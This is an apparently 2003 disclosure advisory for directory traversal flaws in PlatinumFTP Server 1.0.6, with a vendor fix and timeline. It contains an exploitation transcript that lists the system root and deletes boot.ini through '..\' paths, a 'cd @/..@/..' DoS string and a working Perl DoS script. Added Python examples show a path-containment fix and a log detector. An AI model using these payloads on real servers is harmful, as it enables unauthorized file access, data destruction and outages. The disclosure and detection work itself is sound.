
platinumserver.ftp.txt

Posted Jan 6, 2003
Authored by Matrix

The Platinum FTP Server v1.06 contains remote directory traversal vulnerabilities that allow denial of service, listing of any directory on the server, and possibly arbitrary file deletion. A denial of service exploit in Perl is included. Fix available here.

tags | advisory, remote, denial of service, arbitrary, perl, vulnerability
SHA-256 | a8bc055674587d2f973081399e32d98230ea6742287042f8447672f8eb93bdab

              Multiple vulnerabilities found in 
PlatinumFTPserver V1.0.6
PlatinumFTPserver (C)2002 BYTE/400 LTD

Discovered by Matrix
http://www.infowarfare.dk
------------------------------------------------------------------------


SUMMARY

PlatinumFTPserver simplifies management of all your Ftp clients with regards
to sending and receiving program and data files over an IP connection.
Working within a control screen, PlatinumFTPserver gives you total
control: you can create and manage users, user groups and root directories.
You can define what Ftp Commands the users or groups can access.
PlatinumFTPserver provides activity logs, client connection details, file
and megabyte graphical statistics by session and day, virtual folders and a
built in Web Browser. The server engine runs as an application on Windows 9x
and a service under NT/2K/XP.
PlatinumFTPserver can bind to one or all IP addresses within the PC. All
configuration data for the server including password and description fields
are encrypted using the powerful Blowfish cipher. Clients can request files
be zipped before transfer, execute scripts created with the VBscript editor
and also access the shell process.
A vulnerability in the product allows remote attackers to cause
the server to traverse into directories that reside outside the bounding
FTP root directory, delete files and perform a DoS attack on the server.

DETAILS

Vulnerable systems:
* PlatinumFTPServer version 1.0.6
  (also vulnerable with the patch released 14 Dec. 2002 installed)

Immune systems:
* PlatinumFTPServer version 1.0.7

PlatinumFTP's failure to filter out "..\" sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure. It also makes it possible to delete files
and to perform a DoS attack on the server.
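
The missing check, sketched as an added example (not code from the advisory or from the vendor): a server resolves every client path argument to a canonical Windows path and refuses it unless the result is still under the FTP root. The names `resolve_in_root` and `PathEscape` and the root `C:\ftproot` are hypothetical.

```python
import ntpath  # Windows path rules, usable on any OS


class PathEscape(Exception):
    """Raised when a client path resolves outside the FTP root."""


def resolve_in_root(root, cwd, arg):
    """Map a client-supplied FTP path to a Windows path inside `root`.

    root: absolute Windows path of the FTP root (assumed, e.g. C:\\ftproot)
    cwd:  current virtual directory, always '/'-rooted (e.g. '/pub')
    arg:  raw argument of LIST / DELE / CWD as sent by the client
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    # Treat both separators alike: the transcript uses '\', the CWD case '/'.
    virt = arg.replace("\\", "/")
    if ":" in virt:
        raise PathEscape("drive or stream specifier in path")
    # Relative arguments are taken relative to the virtual working directory.
    if not virt.startswith("/"):
        virt = cwd.rstrip("/") + "/" + virt
    # Join onto the real root, then collapse '.' and '..' lexically.
    full = ntpath.normpath(ntpath.join(root, virt.lstrip("/")))
    root_n = ntpath.normcase(ntpath.normpath(root))
    full_n = ntpath.normcase(full)
    # Containment test on the canonical form, never on the raw string.
    # The trailing separator stops C:\ftproot2 from passing as C:\ftproot.
    if full_n != root_n and not full_n.startswith(root_n.rstrip("\\") + "\\"):
        raise PathEscape(f"{arg!r} resolves outside the FTP root")
    return full
```

The comparison is purely lexical; a production server would also resolve junctions and other reparse points before comparing.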

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to support@PlatinumFTP.com
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete ..\..\..\..\boot.ini
250 delete command successful.
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd @/..@/..
ftp> bye
221 Goodbye.

Analysis:
1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected
PlatinumFTPserver can exploit the vulnerability and freely browse the target
system's directory structure. Such information could prove useful in
subsequent attacks and could also help an attacker conduct social
engineering attacks.

2: DELETE Command vulnerability
With this command an attacker can destroy data on the server. As the
transcript above shows, doing so is fairly simple.

3: CD Command vulnerability
The last command, "cd @/..@/..", causes a DoS condition in which
the server uses 99% of the CPU time.
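
For defenders reviewing FTP command logs, the three cases above can be flagged by walking each path argument component by component. This is an added example, not part of the original advisory; the log layout, the sample lines and the names `classify` and `flag_commands` are constructed for illustration.

```python
import re

# FTP verbs that take a pathname argument (RFC 959 command names).
PATH_VERBS = {"CWD", "LIST", "NLST", "DELE", "RETR", "STOR", "RMD", "MKD"}
SEP = re.compile(r"[\\/]+")

# Constructed sample log; the "date time client user VERB argument" layout
# is an assumption, not PlatinumFTPserver's real log format.
SAMPLE_LOG = r"""
2002-12-30 13:44:40 192.0.2.10 anonymous LIST
2002-12-30 13:45:02 192.0.2.10 anonymous LIST ..\..\..\..\
2002-12-30 13:45:40 192.0.2.10 anonymous DELE ..\..\..\..\boot.ini
2002-12-30 13:46:05 192.0.2.10 anonymous CWD @/..@/..
2002-12-30 13:47:11 192.0.2.23 alice RETR docs\..\readme.txt
2002-12-30 13:47:30 192.0.2.23 alice CWD Multimedia Files
""".strip().splitlines()

def classify(arg):
    """Return a reason string if `arg` looks like traversal, else None."""
    depth = lowest = 0
    odd = []
    for part in SEP.split(arg.strip()):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
        else:
            depth += 1
            if ".." in part:
                odd.append(part)  # e.g. '..@': dot-dot glued to other bytes
        lowest = min(lowest, depth)
    if lowest < 0:
        return f"climbs {-lowest} level(s) above the working directory"
    if odd:
        return f"malformed dot-dot component {odd[0]!r}"
    return None

def flag_commands(log_lines):
    """Return [(client, user, verb, arg, reason)] for suspicious commands."""
    hits = []
    for line in log_lines:
        fields = line.split(" ", 5)
        if len(fields) < 6 or fields[4].upper() not in PATH_VERBS:
            continue  # no argument, malformed line, or non-path verb
        _date, _time, client, user, verb, arg = fields
        reason = classify(arg)
        if reason:
            hits.append((client, user, verb.upper(), arg, reason))
    return hits
```

A path such as `docs\..\readme.txt` stays inside its starting directory and is not flagged, which keeps the rule quieter than a plain substring match on `..`.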

Exploit code:
------------------------------------- CUT HERE -----------------------------------------
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Matrix - Matrix@infowarfare.dk
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;


$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";

system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");

print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;

------------------------------------- CUT HERE -----------------------------------------



Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
I have patched the server so that no reference to ../ can be done on any
command issued from the client.
Thanks for notifying me of this problem
Regards
Chris

PlatinumFTPServer version 1.0.7 fixes this issue. The latest version is
available from http://www.platinumftp.com/platinumftpserver.php


Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified (support@PlatinumFTP.com)
01/05/2002 Responses received from support@PlatinumFTP.com
01/05/2002 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by Matrix <matrix@infowarfare.dk>




